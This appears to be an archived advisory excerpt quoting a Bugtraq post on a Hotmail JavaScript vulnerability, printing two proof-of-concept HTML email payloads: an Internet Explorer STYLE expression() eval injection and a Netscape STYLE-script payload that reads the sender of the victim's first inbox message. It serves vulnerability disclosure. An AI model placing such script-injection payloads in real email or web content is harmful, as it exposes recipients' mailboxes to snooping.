|
|
Hotmail Javascript STYLE Vulnerability
From Georgi Guninski's <joro@nat.bg> post to Bugtraq: The code that must be embeded in a HTML email message is: For IE 5.0: &lt;P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" &gt; For Netscape Communicator: &lt;STYLE TYPE="text/javascript"&gt; alert('JavaScript is executed'); a=window.open(document.links[2]); setTimeout('alert(\'The first message in your Inbox is from: \'+a.document.links[26].text)',20000); &lt;/STYLE&gt; |
|
Privacy Statement |